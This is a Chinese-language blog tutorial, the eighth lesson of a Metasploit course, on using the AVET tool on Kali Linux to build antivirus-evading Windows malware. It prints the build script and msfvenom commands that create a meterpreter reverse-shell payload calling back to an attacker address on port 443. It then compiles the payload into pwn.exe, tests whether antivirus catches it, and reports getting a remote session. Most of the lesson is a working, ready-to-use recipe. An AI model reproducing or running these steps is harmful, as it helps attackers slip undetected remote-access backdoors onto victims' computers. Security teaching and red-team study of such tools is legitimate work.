0x00
由于传播,利用此脚本所提供的工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,即刻安全以及工具作者不为此承担任何责任。
Metasploit系列课程第八课 最后的最后一课。这次和以往不同,最后一课不打算用视频,想用文章的形式给各位体现,说实在的个人的时间实在不太充裕,也是最近抽空给各位写下这篇文章。。。
Metasploit 系列教程 => 链接:https://pan.baidu.com/s/1dFzPkJZ 密码:evwg
周年庆版 V1.6 github =>https://github.com/demonsec666/secist_script
0x01
Metasploit系列课程第八课这次使用到的工具呢是(AVET)
1.下载地址 : https://github.com/govolution/avet (其中的几篇pdf 文章不错)
2.在kali中使用这款工具呢。作者提示我们需要安装一样编译器是(tdm-gcc)(作者提供我的,不知道为什么装不上,所以我从官网上下载了,各位也可以使用我提供的)
http://tdm-gcc.tdragon.net/download 链接:https://pan.baidu.com/s/1dFzPkJZ 密码:evwg
3.我们下载完后,将开始使用wine 在kali上安装tdm-gcc(在kali中会有中文乱码,可以跟着我图中步骤走,左图为我mac ,右图为kali 使用wine的情况,因时间关系我未去解决编码的问题,先凑合着看)
0x02
- 我们看下大致的目录情况2.使用方法根据作者提示给我们的是这样的
root@kalidan:~/tools/avet# ./build/build_win32_meterpreter_rev_https_20xshikata.sh
那么我们可以看到他这边调用的是build的目录下的 build_win32_meterpreter_rev_https_20xshikata.sh,使用shell脚本
我们大致的看下这个脚本的代码:#build_win64_meterpreter_rev_tcp_xor 环境变量定义 . avet/build/global_win64.sh
make meterpreter reverse payload
#制作msf reverse payload msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=xxxxx lport=xxx -e x64/xor -f c –platform Windows > avet/sc.txt #make_avet 格式化 这个 shellcode ./avet/format.sh avet/sc.txt > avet/scclean.txt && rm avet/sc.txt #调用 make_avet, compile ./avet/make_avet -f avet/scclean.txt -X -E $win64_compiler -o output/pwn.exe avet.c 输出pwn.exe
cleanup
rm avet/scclean.txt && echo “” > avet/defs.h
- 使用制作payload执行的过程
4.其中只要我们修改的代码呢其实就是msfvenom那段代码 将LHOST 和LPORT 改成自己想要的就可以了
msfvenom -p windows/meterpreter/reverse_https lhost=192.168.116.128 lport=443 -e x86
那么我们重新生成一次,并手动的开启MSF 。
在运行之前我们可以对pwn.exe检测一次是否能绕过AV
效果还算是理想
运行 制作成的pwn.exe后 得到meterpreter.
项目已经上传在GitHub项目中了
最后的彩蛋 我使用ruby 做的GUI=> GTK
视频演示:
转载请注明:即刻安全 » Metasploit系列课程第八课